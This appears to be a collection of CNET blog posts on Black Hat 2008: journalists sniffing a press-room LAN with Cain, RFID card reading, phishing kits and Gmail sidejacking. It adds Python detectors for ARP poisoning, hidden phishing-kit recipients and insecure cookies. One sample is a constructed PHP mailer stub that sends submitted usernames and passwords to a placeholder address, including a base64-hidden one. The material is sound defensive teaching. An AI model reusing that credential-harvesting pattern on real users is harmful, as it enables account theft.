LAS VEGAS--On the second day of the Black Hat security conference, a trio of journalists turned on other journalists within the press room.
This was my ninth Black Hat in nine years, and I have lived in dread year after year that such a headline would affect me. On Thursday, CNET News was named as one of the two organizations "hacked," but I disagree that any such hack occurred.
Just before noon on Thursday, a trio of reporters from Global Security Mag sat in one of the two press rooms at Black Hat. Both rooms have a wired LAN that is separate from the wireless network open to everyone attending the conference. What happened on Thursday was not a wireless attack--it is important to stress that. Most of the reporters in the press room are veterans of security conferences and take precautions against such attacks. Even so, the press room is separate from the conference floor and often a safe harbor for posting our stories to the Internet. Conference speakers and members of the Black Hat staff also use this network.
Mauro Israel, one of the Global Security Mag reporters, is alleged to have used a USB device on his laptop to turn it into a gateway for all Internet packets passing through the wired network switch located at each table in the room. In other words, he routed all the traffic on the LAN through his computer and used a program called Cain to view the packet contents. It is unclear how long this went on. Log files seen by CNET News suggest it might have been only a short period before lunch on Thursday.
Cain, the tool used to view the packet information, can be a helpful network administrator tool. But in the wrong hands it can also be used to intercept other people's traffic on a network, in violation of federal wiretapping laws.
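The article does not say which Cain feature was used; Cain's ARP poison routing (APR) is the usual way a laptop on a switched LAN makes itself the path between every other host and the gateway, and the monitor below assumes that mechanism. It is an added example written for this page, not code from the article, from Cain, or from the Black Hat staff. The gateway address and the ARP replies are constructed; a real deployment would feed it replies sniffed from the same switch.

```python
"""ARP poison-routing detector over a stream of ARP replies.

Added example for this article; it is not code from the page or from Cain.
The replies below are constructed, not captured at Black Hat. Assumptions:
the LAN's gateway address is known (GATEWAY_IP), and a monitor on the same
switch sees every ARP reply as (time, sender IP, sender MAC).
"""
from collections import defaultdict
from dataclasses import dataclass

GATEWAY_IP = "192.168.1.1"  # assumption: the press-room LAN's default gateway


@dataclass(frozen=True)
class ArpReply:
    ts: float
    sender_ip: str
    sender_mac: str


# Constructed sample. Replies 1-3 are the normal picture. Replies 4-5 show a
# third host (de:ad:be:ef:00:01) announcing itself as the gateway and then as
# a workstation: both ends now send their traffic through that host.
SAMPLE_REPLIES = [
    ArpReply(10.0, "192.168.1.1", "00:11:22:33:44:55"),
    ArpReply(10.5, "192.168.1.20", "00:aa:bb:cc:dd:20"),
    ArpReply(11.0, "192.168.1.21", "00:aa:bb:cc:dd:21"),
    ArpReply(12.0, "192.168.1.1", "de:ad:be:ef:00:01"),
    ArpReply(12.1, "192.168.1.20", "de:ad:be:ef:00:01"),
]


def detect_arp_poisoning(replies, gateway_ip=GATEWAY_IP):
    """Return (severity, message) alerts for rebindings seen in `replies`.

    Two signals: an IP address whose MAC changes (HIGH when it is the
    gateway, MEDIUM otherwise, since DHCP churn can do that legitimately),
    and a single MAC that claims the gateway plus at least one other host,
    which is what a man-in-the-middle on the LAN looks like.
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for r in replies:
        prev = ip_to_mac.get(r.sender_ip)
        if prev is not None and prev != r.sender_mac:
            sev = "HIGH" if r.sender_ip == gateway_ip else "MEDIUM"
            alerts.append((sev, f"t={r.ts}: {r.sender_ip} moved from {prev} to {r.sender_mac}"))
        ip_to_mac[r.sender_ip] = r.sender_mac
        mac_to_ips[r.sender_mac].add(r.sender_ip)
        claimed = mac_to_ips[r.sender_mac]
        if gateway_ip in claimed and len(claimed) > 1:
            others = sorted(claimed - {gateway_ip})
            alerts.append(("HIGH", f"t={r.ts}: {r.sender_mac} claims the gateway and {others}"))
    return alerts


if __name__ == "__main__":
    for sev, msg in detect_arp_poisoning(SAMPLE_REPLIES):
        print(sev, msg)
```

Run stand-alone it prints three alerts, two of them HIGH. The second signal will also fire on a legitimate router that answers ARP for several addresses (proxy ARP, VRRP), so in practice the known gateway MACs are whitelisted before paging anyone. Note that none of this helps a user whose traffic is already being relayed; the VPNs mentioned below are what keep the relayed packets unreadable.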
After lunch, Israel, Dominique Jouniot, and Marc Brami from Global Security Mag moved to the table where I was sitting with my colleague Elinor Mills. I use a commercial encrypted VPN service to connect to my office remotely; Mills uses the corporate VPN we have at CNET. We suspect that when I left the table, the trio turned their attention to CNET. Mills, also a veteran of many security conferences, offers a first-person account of being targeted here.
The reporters' badges sit on a chair after they were confiscated.
(Credit: Declan McCullagh/CNET News)
Ironically, I left the table to go and interview Aries Security, the guys running the Wall of Sheep, a project that passively monitors the open wireless network traffic at Black Hat and Defcon for the purpose of educating users on safe practices. What I didn't realize was that Brami, Jouniot, and Israel had been talking with the Wall of Sheep guys just prior to my arrival. One member of Aries Security, Riverside, even made a comment about "journalists hacking journalists."
I didn't get the reference at the time.
Apparently, Israel and his colleague tried moments before I arrived to get the usernames and passwords for reporters from eWeek and CNET added to the Wall of Sheep, a display of partially obscured usernames and passwords that is sometimes referred to as the "Wall of Shame." Riverside and others at Aries Security told them they would not post journalists' names to the Wall of Sheep because the press room was on a network separate from the one they were monitoring.
Another reporter who had been sitting in the Wall of Sheep room, Humphrey Cheung of TGDaily, overheard the conversation with Brami, became curious, and was allowed to take a photo of Israel's laptop screen. Those photos are important. The images that appear on the TGDaily site are redacted, of course. I later saw the originals.
What the trio of French reporters offered the Wall of Sheep was a Cain log with columns for timestamps, HTTP, client, username, and other information. From the log screen, it is apparent that on Thursday, beginning at 10:55 a.m., there were packets captured that were going out to eWeek.com. The IP address in the log resolved to a log-in page, presumably for a publishing tool used at that publication. The Wall of Sheep asks that submissions be done via Notepad file, so Israel pasted the username, password, and destination IP address into a file.
One eWeek reporter, Brian Prince, later confirmed his username and password were collected and displayed. eWeek immediately changed his password. Prince was not using a VPN for reasons he explained here.
But here's where it gets curious. A second line was added to the Notepad file, this one purportedly showing log-in information from news.cnet.com. When I saw the un-redacted photo, I knew instantly that the reference to CNET was a fake. My colleague Declan McCullagh resolved the IP address given as the destination to the CNET News home page--not a tool page, but our standard home page. That is easily explained: anyone in the press room could have surfed to that page.
What tipped me off that the reference to CNET was truly bogus is that the username was a word within the code of the home page, a word anyone might find by right clicking and viewing the page source. Second, the password "control" wasn't strong enough, nor did it belong to Declan, Elinor, or myself. It was a fake.
I went back to the Wall of Sheep. Riverside was incredibly helpful, confirming that reporters from Global Security Mag had been there offering some log data. He even had the business card for Marc Brami, director of the publication. Moments later, a spokesperson for Black Hat confirmed that conference officials were looking for Brami and his colleagues as well. The three were later required to leave the conference and are banned for life from Black Hat and its sister conference, Defcon.
What I don't understand is if this was a prank--as Brami has suggested to Mills--then why didn't they simply say to Prince or anyone else in the press room that they could see their network communications? And, if they simply wanted to send a message to U.S. journalists about laptop security--as they reportedly suggested to the Black Hat officials--why did they apparently lie about CNET also being exposed?
A strange thing happened on Thursday. As the story unfolded, reporters from competing publications gathered in the press room. It was a bonding moment. The protected network in any press room is a circle of trust, and when that trust is violated, bad things can happen. Potentially everyone in the room had been a victim. And as such, we rallied around each other for support.
As a result of Thursday night's events, I think I know my security colleagues a little better, and that's a good thing. They're good, hard-working reporters. But in the future, if anyone I don't know joins me at a press table, I'm going to interrogate them, and a few others have told me they will as well, and that's a bad thing.
Like the biblical story, this instance of Cain has also brought evil into a world that was previously safe and welcoming.
Kurt Opsahl, left, a senior staff attorney at the Electronic Frontier Foundation, discusses the ejection of the three French journalists over networking snooping allegations.
(Credit: Declan McCullagh/CNET News)
LAS VEGAS--This year marks my ninth year of attending Black Hat in Las Vegas. From a small gathering of security professionals in 2000 to an uberconference in 2008, Black Hat has scaled well. And the transition from private company to corporate-owned also appears smooth. But hardly anyone's here yet.
On Tuesday, there are only a thousand or so attendees of the 30-some training sessions. Already I've noticed a few minor changes from last year.
The press room is now on the third floor, away from the maddening crowds. This may or may not work since almost all the sessions are on the fourth floor. So far the escalators have been jammed during breaks and it will only get worse as Black Hat ramps up.
Lunch, served in a tent located in the front of Caesar's Palace, is now buffet as opposed to being a serviced meal. This gives quicker access to the food (no more waiting until everyone at your table had finished a course before the next course was served). However the buffet itself (at least four different food stations) also removed a good chunk of tables and seats. By my count only one thousand people can eat at one time.
To accommodate the rest of us, Black Hat is also serving boxed lunches on the third floor. My lunch ticket is for a boxed lunch. I suspect that vendors and press will be shunted into the cold box-lunch room.
There are about 30 vendors set up across from the Augustus ballrooms. Last year it was impossible to move from session to session without bumping into the vendor tables. While this year's location is better, it's still not ideal. Perhaps next year Black Hat will simply shunt the vendors into a separate room. Those who want to chit-chat with the vendors can do so, while the rest of us get to our sessions unimpeded.
The hall for Dan Kaminsky's DNS talk seems too small. Maybe they'll simulcast it on jumbo screens in the hallway. We'll see on Wednesday.
Jeff Moss, founder and director of Black Hat, on Thursday moderated the first-ever Black Hat Webinar, previewing five presentations to be given at the security conference in Las Vegas in August.
Moss said he was pleased that more than 1,000 people attended and admitted they were "expecting maybe a few hundred." Black Hat has already implemented RSS feeds, Twitter, and even a LinkedIn group.
"The Webinars will be much more than that," Moss said. In the future, he hinted, Black Hat will publish an editorial calendar, with a new Webinar at least once a month. Moss said that if successful, future Webinars might also include online training.
During the one-hour broadcast, speakers gave 10-minute previews of five presentations expected during the Black Hat briefings in Las Vegas, which will take place August 6-7.
Bruce Potter, founder of the Shmoo Group, talked about "malware detection through network flow analysis." He said he will be releasing some software at the conference. He argued that network administrators can examine data flowing both ways on the network to help identify where the attacker is coming from. Software expected in August includes an updated version of Psyche that will have an Ajax-based interface.
Fyodor Vaskovich, founding member of the Honeynet Project, talked about "Nmap--Scanning the Internet." The author of Nmap recently scanned the entire Internet--the WorldScan Project--and will present his results. The data let him verify or refute various assumptions about which ports to probe when scanning. Also, he said, it forced him to improve Nmap.
He gave a few examples: the Nmap Scripting Engine, fixed-rate packet sending, enhanced version detection, and improvements to performance and accuracy.
Shawn Moyer, CISO of Agura Digital Security, and Nathan Hamiel, senior consultant for Idea Information Security and founder of the Hexagon Security Group, previewed their talk "Satan is on My Friends List: Attacking Social Networks." They said they're not just talking about worm attacks such as Samy back in 2005. They're talking about user-generated applications and content--are they creating new attack surfaces? They will also have demonstrations and screen captures to share in August.
Nathan McFeters and John Heasman talked about "Beyond document.cookie." In August they'll be joined by Rob Carter in talking about Web 2.0 same-origin policy attacks and other Web 2.0 vulnerabilities.
Steve Reavey, Katie Moussouris, and Steve Adegbite, all of Microsoft, talked about "Secure the Planet! New Strategic Initiatives from Microsoft to Rock Your World" or the shorter title "Has Microsoft lost its mind?" Among other things, they said they will talk about how Microsoft approaches a security update within Office, from vulnerability disclosure to patch. Microsoft will also be hosting a two-day "Defending the Flag" training just prior to the public part of Black Hat on August 2 and 3, and again on August 4 and 5, to show administrators how to attack Microsoft products in order to gain insight into how their networks are secured.
After a short question-and-answer period, Moss said the next Webinar will be held "in about a month" and offered an e-mail address (subscribe-webcasts@blackhat.com) to subscribe for updates.
On Wednesday, Black Hat officials opened their Call For Papers (CFP) site to paid attendees registered for this summer's Black Hat USA 2008 Briefings and Trainings.
In February, speaking at Black Hat D.C. 2008, director Jeff Moss said his idea is to make the redesigned Black Hat Web site more interactive between speakers and attendees. The first improvement is to give future attendees a voice in choosing what speakers and presentations they'd like to see. Black Hat USA 2008, to be held August 2-7 at Caesar's Palace in Las Vegas, is the first conference to offer this function.
Moss said in an e-mail that the "ratings will help us create the show you want to attend, and even help focus presentations as they're being created. We are excited to see what kind of information we learn about what interests our delegates and what kind of talks meet their needs best."
At present, the Black Hat CFP lists more than 80 submissions. The submission period will continue through May 1, when final selection will begin.
Approved talks will then be programmed into a dozen topic-based tracks, including Zero Day, Zero Day Defense, Application Security 1.0/2.0, Bots and Stuff, Covert, Deep Knowledge, Forensics & Anti-Forensics, Hardware, the Network, New Hotness, Over the Air (OTA), Privacy and Anonymity, and Turbo Talks. A new track, Un-Track, will be an opportunity for attendees and presenters to talk after a session, and was tested after sessions in Washington, D.C.
Moss also hinted that future improvements to the Black Hat site may include online forums.
Breaking things--that's what the very bright and super curious do; they look beyond the obvious to see what's truly lurking beneath the surface. On Wednesday and Thursday, attendees at Black Hat D.C. 2008 got a window into the latest research being done on Web applications, wireless, and embedded technologies.
On Wednesday, researchers David Hulton and "Steve" showed how, with about $1,000 worth of equipment, they can decrypt A5/1-encrypted GSM cellular traffic in less than an hour. Following that, Adam Laurie reprised his popular RFIDiots talk from last year's Black Hat briefings with a new program that lets him read the data off smart credit cards "hands free."
Wednesday night included a social. There was also a speaker from the Washington, D.C.-based Spy Museum with stories of real-life spies.
On Thursday, Tiller Beauchamp and David Weston gave a presentation on using DTrace, the dynamic tracing framework now built into Mac OS X Leopard and coming soon to various Linux distributions, for security research. Following that, Zac Franken reprised his previous talk on biometric and token-based access control systems with new information on work access cards. After lunch, talks included Chris Wysopal on classification and detection of backdoors, Jason Larson on SCADA security, and Jon Oberheide on exploiting virtual machine migrations.
Update on February 22, 2008, at 3:20 p.m. PST: This blog has been updated to include a response from American Express.
WASHINGTON D.C.--Adam Laurie, an RFID security expert, used the Black Hat DC 2008 conference here to demonstrate a new Python script he's working on to read the contents of smart-chip-enabled credit cards.
As part of his presentation Wednesday, Laurie asked for someone from the audience to volunteer a smart card. Without taking the card out of the volunteer's wallet, Laurie both read and displayed its contents on the presentation screen--the person's name, account number, and expiration clearly visible.
Demonstrations like that show the potential misuse of RFID technology in the near future. Without touching someone, a thief could sniff the contents of an RFID-enabled credit card just in passing. The same is true for embedded RFID chips in the human body, work access badges, some public transit cards, and even the new passports in use in more than 45 countries.
As a disclaimer, Laurie said he spoke to American Express, the company that issued the volunteer's card. Laurie said that American Express told him: "We are comfortable with the security of our product." Laurie added that the company told him the number he displayed on the presentation screen was not the account number printed on the card, which Laurie proved by opening the wallet and comparing.
"The alias number on American Express' ExpressPay cannot be used for online transactions," said Molly Faust, American Express' Public Affairs representative, in an e-mail to CNET News.com. "ExpressPay has multiple security mechanisms. As the payment host, American Express would not verify/authorize an online transaction using just the alias account number. There are several other security mechanisms that would be required in order for payment authorization to take place."
The credit card industry has argued that use of the RFID-enabled cards will save customers time when processing payments.
An extreme example can be found in Spain. Laurie said a public beach there encourages visitors to have RFID tags injected into their bodies. The point? Merchants along the beach scan your wrist to obtain a unique ID from which they can debit your account. The advantage? You won't have to go to the beach with your wallet, which might get stolen.
Laurie, who has an injected RFID tag, showed how easy it was not only to read the tag but also to rewrite it. During his demo, he used the coding sequence reserved for animal tagging to have his RFID chip declare him an animal.
On his RFIDiot Web site, Laurie offers the Python scripts free of charge and also sells the hardware necessary to read and write to RFID tags and cards.
WASHINGTON D.C.--On Wednesday, in a talk at Black Hat D.C. 2008, two researchers set out to see whether phishing sites were created by the "Einsteinian, ninja hackers that the media makes them out to be."
In a talk titled "Bad Sushi: Beating Phishers at their own game," Nitesh Dhanjani and Billy Rios found not a sophisticated gang of elite coders, but hundreds of bad coders all copying one another, and often stealing from each other.
Dhanjani and Rios expressed disapproval of antiphishing products that use blacklists to block known phishing sites. First, because a legitimate server administrator whose machine has been compromised might find the stolen account password visible on such a list. Second, because the researchers themselves were able to open those lists and see which servers were being compromised.
They followed one of the servers that had shown up on one black list multiple times. What they found was a poorly configured Internet-facing server, one that was easily compromised, and therefore hosting several phishing sites.
Once they found a compromised Web server, they then wondered: how hard is it to create an authentic-looking phishing site? Dhanjani and Rios found kits online, prepackaged with images and forms from Bank of America, Citibank, and PayPal, among others. Just install one of these kits on a compromised server and you're in business.
Looking deeper into the code used in these kits, they found that one kit had been copied many times, with different images. Moreover, the creator of the kit was skimming off the people using the kit; every time someone fell for a phishing site, their personal data not only went to the phisher who put up the site, but also to the author who wrote the kit.
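The skimming Dhanjani and Rios describe only works if the kit's mailer quietly sends a second copy of each victim's data to the kit author, and that second address is usually hidden so the phisher renting the kit does not notice it. The scanner below, an added example that is not code from the article, from the researchers, or from any real kit, pulls every recipient address out of a kit's mailer script, including addresses stashed in base64. The PHP in SAMPLE_KIT_PHP is a constructed stand-in with example.net/example.org placeholder addresses, not a real kit.

```python
"""Find every recipient address baked into a phishing kit's mailer.

Added example; not code from the article, from Dhanjani and Rios, or from any
real kit. SAMPLE_KIT_PHP is a constructed stand-in for a kit's mailer script
and the addresses in it are example.net/example.org placeholders.
"""
import base64
import re

SAMPLE_KIT_PHP = r'''<?php
$send = "operator@example.net";
$msg = "---- Login ----\nUser: " . $_POST['user'] . "\nPass: " . $_POST['pass'] . "\n";
mail($send, "Result", $msg);
$k = "a2l0YXV0aG9yQGV4YW1wbGUub3Jn";
mail(base64_decode($k), "Result", $msg);
header("Location: https://bank.example/login");
?>'''

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Runs of base64 alphabet long enough to hide an address; decoded and re-scanned.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_recipients(source):
    """Map each address found in `source` to how it was encoded."""
    found = {}
    for m in EMAIL_RE.finditer(source):
        found.setdefault(m.group(0), "plain")
    for m in B64_RE.finditer(source):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text once decoded
        for addr in EMAIL_RE.findall(decoded):
            found.setdefault(addr, "base64")
    return found


def hidden_recipients(source):
    """Addresses that only appear in encoded form: the kit author's cut."""
    return sorted(a for a, how in find_recipients(source).items() if how != "plain")


if __name__ == "__main__":
    for addr, how in sorted(find_recipients(SAMPLE_KIT_PHP).items()):
        print(f"{how:7} {addr}")
```

On the sample it reports the operator's address as plain and the kit author's as base64. Real kits also use eval() on gzip'd strings, hex escapes and string concatenation, so an analyst extends the decoders rather than trusting the plain regex; the structure stays the same: decode every encoded literal and re-run the address search on the result.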
With personal information flowing in, what does the average phisher do next? Dhanjani and Rios googled to find sites trading personal data--not a surprising find. What they found was that U.S. and U.K. IDs often sold for much less than European and Asian data. They could not account for the difference.
They also found forums and sites dedicated to ATM "skimming." Skimming is the physical attachment of secondary card readers and keypads to ATMs to capture account numbers and PINs. Often the ATM transaction still goes through, and the customer doesn't realize the account has been compromised until later.
Dhanjani and Rios suggested that site administrators should lock down their sites so that phishing kits don't take root. They also suggested that sites require more security in order to raise the bar. By requiring a customer to use two-factor authentication, or a persistent cookie, many of the financial phishing sites would cease to be effective, they said.
WASHINGTON D.C.--Like the Bank of America brand name, the United States Internal Revenue Service is a brand that also needs online protection. On Wednesday, Special Agent Andy Fried with the U.S. Treasury Department gave a second keynote address to start off Black Hat DC 2008. He said as of February 19 this year, there were 1,630 phishing sites using the IRS name or logo, marking a 12 percent to 17 percent increase over last year.
Although IRS phishing sites may be taken down within an hour or so, that's still long enough for a victim to volunteer personal information online. Fried stated that the IRS does not contact people via e-mail. He also noted that many of the phishing sites and e-mails came "out of Eastern Europe."
While he was concerned about ordinary people getting hit, his bigger worry was the IRS itself: every morning, staff arrive to find forwarded examples of the latest IRS-themed e-mail in their inboxes, any of which could carry malware into the agency. He called on the antivirus community to push out protection for each new campaign before IRS staff report for work.
Fried said that in January 2008, IRS-themed messages accounted for a full one percent of all spam traded on the Internet--a record for the agency.
Fried also warned against using peer-to-peer applications on the same desktop with your tax information on it. He and his investigators will periodically fire up LimeWire and find hundreds of copies of people's tax returns available for downloading. "If you don't know what you are doing with P2P," said Fried, "don't use it."
Fried said he expected more IRS-themed Internet activity in May when the U.S. government plans to issue tax rebates to qualified individuals, but declined to specify what he expected.
WASHINGTON--On Wednesday, Black Hat D.C. 2008 gets under way, after two days of intense training sessions. The D.C. Black Hat security conference is much smaller than the summer Black Hat USA in Las Vegas. But what D.C. lacks in size, it makes up for in sessions and talks.
On tap for Wednesday is a keynote speech from Jerry Dixon, former director of the National Cyber Security Division, Department of Homeland Security. Following the keynote address will be two parallel tracks of programming--Web app and wireless--including presentations from Chuck Willis of Mandiant on forensic challenges of cross-site scripting, Adam Laurie on practical RFID hacking, Nitesh Dhanjani and Billy Rios on beating phishers, Sachin Joglekar and Sundeep Patwardhan on attacks on VoIP through IPSec tunnels, and Neal Krawetz on image analysis.
Thursday will continue with two parallel tracks--defense and hardware/embedded--and will include Christopher Tarnovsky discussing security failures in secure devices, Zac Franken on biometrics, as well as others.
Throughout the two-day event there will be various birds-of-a-feather talks, opportunities to talk to session speakers, and on Wednesday evening, additional speakers.
Robert Graham, CEO of Errata Security, who last year found that it's possible to capture someone's session cookie via wireless eavesdropping, now says that even encrypted services such as Google's Gmail can sometimes provide him with a session cookie. This is a departure from his advice last August when he said SSL HTTPS sessions of Gmail should be immune.
Graham, working with David Maynor, created two tools (Ferret and Hamster), which together help him grab session cookies out of thin air, say, at a local hot spot, like an Internet cafe. Session cookies allow you to shop at an e-commerce site, then leave the page and return later without re-entering your password. One doesn't have to decode the user's password to exploit the session cookie, merely possess it.
Graham gave a live demonstration of his sidejack attack on an audience member's Gmail account at last year's Black Hat USA, displaying that person's inbox before a standing-room-only crowd.
Now Graham says that Gmail's JavaScript front end will sometimes make its background requests over plain HTTP rather than SSL, and this lets his tool grab the session cookie and thus read someone else's e-mail. The same could be true of Amazon.com and other Web 2.0 sites.
"In theory, Graham says, "using the HTTPS version of Gmail should protect you by going to https://mail.google.com/mail, but this doesn't work as you think. The JavaScript code uses an XMLHttpRequest object to make HTTP requests in the background. These are also SSL encrypted by default, but they become unencrypted if SSL fails."
Graham provides more details in his blog.
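What makes the fallback Graham describes dangerous is not the fallback itself but the cookie rules: a browser attaches every cookie for the domain to an http:// request unless the cookie was set with the Secure attribute, so one unencrypted XMLHttpRequest hands the session to anyone sniffing the hot spot. The script below is an added example, not code from the article or from Graham's Ferret and Hamster tools; the Set-Cookie headers are constructed and do not reproduce Gmail's real cookie names or values.

```python
"""Which cookies ride along on an unencrypted fallback request.

Added example; not code from the article or from Graham's tools (Ferret,
Hamster). The Set-Cookie headers are constructed; they do not reproduce
Gmail's real cookie names or values.
"""

SESSION_HINTS = ("sess", "sid", "auth", "token", "login")

# Constructed: the same session cookie set without and with the Secure flag,
# plus a preference cookie that carries no authority.
SAMPLE_SET_COOKIES = [
    "SID=d3adb33f; Domain=.mail.example; Path=/",
    "SID=d3adb33f; Domain=.mail.example; Path=/; Secure; HttpOnly",
    "PREF=lang=en; Domain=.mail.example; Path=/",
]


def parse_set_cookie(header):
    """Split a Set-Cookie value into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), value, attrs


def cookies_sent_over(headers, scheme):
    """Names a browser would attach to a request made over `scheme`.

    A cookie without the Secure attribute is sent on http:// as well as
    https://, which is exactly what a JavaScript request that fell back
    to plain HTTP would leak to anyone sniffing the hot spot.
    """
    sent = []
    for h in headers:
        name, _, attrs = parse_set_cookie(h)
        if scheme == "https" or "secure" not in attrs:
            sent.append(name)
    return sent


def audit_set_cookie(header):
    """Findings for one Set-Cookie header; empty when it is fine."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if any(hint in name.lower() for hint in SESSION_HINTS):
        if "secure" not in attrs:
            findings.append("missing Secure (sent over plain http://)")
        if "httponly" not in attrs:
            findings.append("missing HttpOnly (readable by page scripts)")
    return findings


if __name__ == "__main__":
    print("sent over http: ", cookies_sent_over(SAMPLE_SET_COOKIES, "http"))
    print("sent over https:", cookies_sent_over(SAMPLE_SET_COOKIES, "https"))
    for h in SAMPLE_SET_COOKIES:
        print(h.split(";")[0], "->", audit_set_cookie(h) or "ok")
```

The first SID header is sent on the http:// fallback and the second is not; that single attribute is the difference between Hamster getting a usable session and getting nothing. A site audit runs audit_set_cookie over the Set-Cookie headers of its login response, and a user who cannot change the site's cookies is back to Graham's original advice: a VPN, so that the fallback request never crosses the hot spot in the clear.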